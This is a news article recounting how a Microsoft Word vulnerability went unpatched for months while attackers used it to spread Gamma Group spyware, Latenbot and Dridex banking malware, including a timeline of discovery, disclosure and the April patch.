Microsoft took 9 MONTHS to solve a Word bug that let hackers take control of computers and spy on millions

  • Dangerous bug allowed hackers to insert a links to malware in Word documents 
  • Criminals used the bug to send spying software to soldiers in Russia and Ukraine
  • Hackers then sent banking-fraud software to millions of computers in Australia

A dangerous security problem in Microsoft Word took so long to fix that hackers were able to use it to spy on millions of people.

While Microsoft struggled to come up with a fix, hackers used the bug to take control of computers and send spying and banking-fraud software.

Criminals even used the bug to spy on the computers of soldiers in Russia and Ukraine, it was revealed today. 

Scroll down for video 

A dangerous security problem in Microsoft Word took so long to fix that hackers were able to use to spy on millions of people (stock image)

A dangerous security problem in Microsoft Word took so long to fix that hackers were able to use to spy on millions of people (stock image)

TIMELINE OF EVENTS 

July 2016:  Ryan Hanson, a 2010 Idaho State University graduate and consultant at boutique security firm Optiv Inc in Boise, found a weakness in the way that Microsoft Word processes documents from another format.

October 2016: Mr Hanson told Microsoft about the threat.

But the company fail to act to remove the bug. 

January 2017: Hackers discover the flaw and cyber attacks begin.

The first known victims were sent emails enticing them to click on a link to documents in Russian about military issues, researchers said.

Their computers were then infected with eavesdropping software made by Gamma Group, a private company that sells to agencies of many governments.

March 2017: Hackers start using the bug to send financial hacking software to a small number of computers.

April 7: Security firm McAfee notice the problem and raise the alarm on a blog post.

But their post alerts many more hackers to the deadly security flaw.

April 8: Attacks go mainstream. Someone used the bug to send documents booby-trapped with banking-fraud software to millions of computers in Australia.

April 11: Microsoft finally release a patch to fix the bug in a security update.

It is unclear how many people were ultimately infected or how much money was stolen. 

Advertisement

The bug allowed a hacker to seize control of a personal computer with little trace.

It was finally fixed on April 11 after nine months of inaction from the tech giant, which cyber security experts say is an unusually long time.

Google's security researchers, for example, give vendors just 90 days' warning before publishing flaws they find. 

Microsoft declined to say how long it usually takes to patch a flaw.

While Microsoft investigated, hackers found the flaw and manipulated the software to spy on unknown Russian speakers, possibly in Ukraine.

And a group of thieves used it to bolster their efforts to steal from millions of online bank accounts in Australia and other countries.

Last July, Ryan Hanson, a 2010 Idaho State University graduate and consultant at boutique security firm Optiv Inc in Boise, found a weakness in the way that Microsoft Word processes documents from another format. 

That allowed him to insert a link to a malicious programme that would take control of a computer.

Hanson spent some months combining his find with other flaws to make it more deadly, he said on Twitter. 

Then in October he told Microsoft. The company often pays a modest bounty of a few thousands dollars for the identification of security risks.

Soon after that point six months ago, Microsoft could have fixed the problem, the company acknowledged. But it was not that simple. 

A quick change in the settings on Word by customers would do the trick, but if Microsoft notified customers about the bug and the recommended changes, it would also be telling hackers about how to break in.

Alternatively, Microsoft could have created a patch that would be distributed as part of its monthly software updates. 

But the company did not patch immediately and instead dug deeper.

It was not aware that anyone was using Hanson's method, and it wanted to be sure it had a comprehensive solution.

A previously undiscovered exploit in Microsoft Word is being used to spread trojan software called Dridex. Victims gets an email which appears to be from a reputable bank or financial firm with an infected Word document attached (pictured)

A previously undiscovered exploit in Microsoft Word is being used to spread trojan software called Dridex. Victims gets an email which appears to be from a reputable bank or financial firm with an infected Word document attached (pictured)

'We performed an investigation to identify other potentially similar methods and ensure that our fix addresses more than just the issue reported,' Microsoft said through a spokesman, who answered emailed questions on the condition of anonymity. 'This was a complex investigation.'

Hanson declined interview requests.

The saga shows that Microsoft's progress on security issues, as well as that of the software industry as a whole, remains uneven in an era when the stakes are growing dramatically.

The United States has accused Russia of hacking political party emails to interfere in the 2016 presidential election, a charge Russia denies.

The flaw allows cyber criminals to insert hidden malicious code into the body of a document. By clicking on a pop-up (pictured) to accept additional data being imported into the document, the HTML-based malware  is able to infect your computer

The flaw allows cyber criminals to insert hidden malicious code into the body of a document. By clicking on a pop-up (pictured) to accept additional data being imported into the document, the HTML-based malware is able to infect your computer

While shadowy hacker groups opposed to the U.S. government have been publishing hacking tools used by the Central Intelligence Agency and National Security Agency.

It is unclear how the unknown hackers initially found Hanson's bug. 

WHAT IS DRIDEX? 

Dridex is an online banking malware that steals personal information by attaching HTML coding to innocuous looking documents.

The victim gets an email with a Microsoft Word or Excel document attached.

The attacks lure the victims to open the attachment by using the names of legitimate companies.

Some of the emails refer to an 'attached invoice', stating it comes from a software company, online retailer or bank.

In the past, it has mainly targeted customers of financial and banking institutions based in Europe, according to computer security firm Symantec. 

Advertisement

It could have been through simultaneous discovery, a leak in the patching process, or even hacking against Optiv or Microsoft.

In January, as Microsoft worked on a solution, the attacks began.

The first known victims were sent emails enticing them to click on a link to documents in Russian about military issues in Russia and areas held by Russian-backed rebels in eastern Ukraine, researchers said. 

Their computers were then infected with eavesdropping software made by Gamma Group, a private company that sells to agencies of many governments.

The best guess of cyber security experts is that one of Gamma's customers was trying to get inside the computers of soldiers or political figures in Ukraine or Russia.

Either of those countries, or any of their neighbors or allies, could have been responsible.

The initial attacks were carefully aimed at a small number of targets and so stayed below the radar. 

But in March, security researchers at FireEye Inc noticed that a notorious piece of financial hacking software known as Latenbot was being distributed using the same Microsoft bug.

FireEye probed further, found the earlier Russian-language attacks, and warned Microsoft. 

The company, which confirmed it was first warned of active attacks in March, got on track for an April 11 patch.

Then, what counts as disaster in the world of bug-fixers struck. Another security firm, McAfee, saw some attacks using the Microsoft Word flaw on April 6.

After what it described as 'quick but in-depth research,' it established that the flaw had not been patched, contacted Microsoft, and then blogged about its discovery on April 7.

The blog post contained enough detail that other hackers could mimic the attacks.

Other software security professionals were aghast that McAfee did not wait, as Optiv and FireEye were doing, until the patch came out.

McAfee Vice President Vincent Weafer blamed 'a glitch in our communications with our partner Microsoft' for the timing. He did not elaborate.

By April 9, a programme to exploit the flaw was on sale on underground markets for criminal hackers, said FireEye researcher John Hultquist.

The next day, attacks were mainstream. Someone used it to send documents booby-trapped with Dridex banking-fraud software to millions of computers in Australia.

Finally, on the Tuesday, about six months after hearing from Hanson, Microsoft made the patch available. 

As always, some computer owners are lagging behind and have not installed it.

Ben-Gurion University employees in Israel were hacked, after the patch, by attackers linked to Iran who took over their email accounts and sent infected documents to their contacts, said cyber security firm Morphisec.

When Microsoft patched, it thanked Hanson, a FireEye researcher and its own staff.

A six-month delay is bad but not unheard of, said Marten Mickos, chief executive of HackerOne, which coordinates patching efforts between researchers and vendors.

'Normal fixing times are a matter of weeks,' Mickos said.

It is unclear how many people were ultimately infected or how much money was stolen.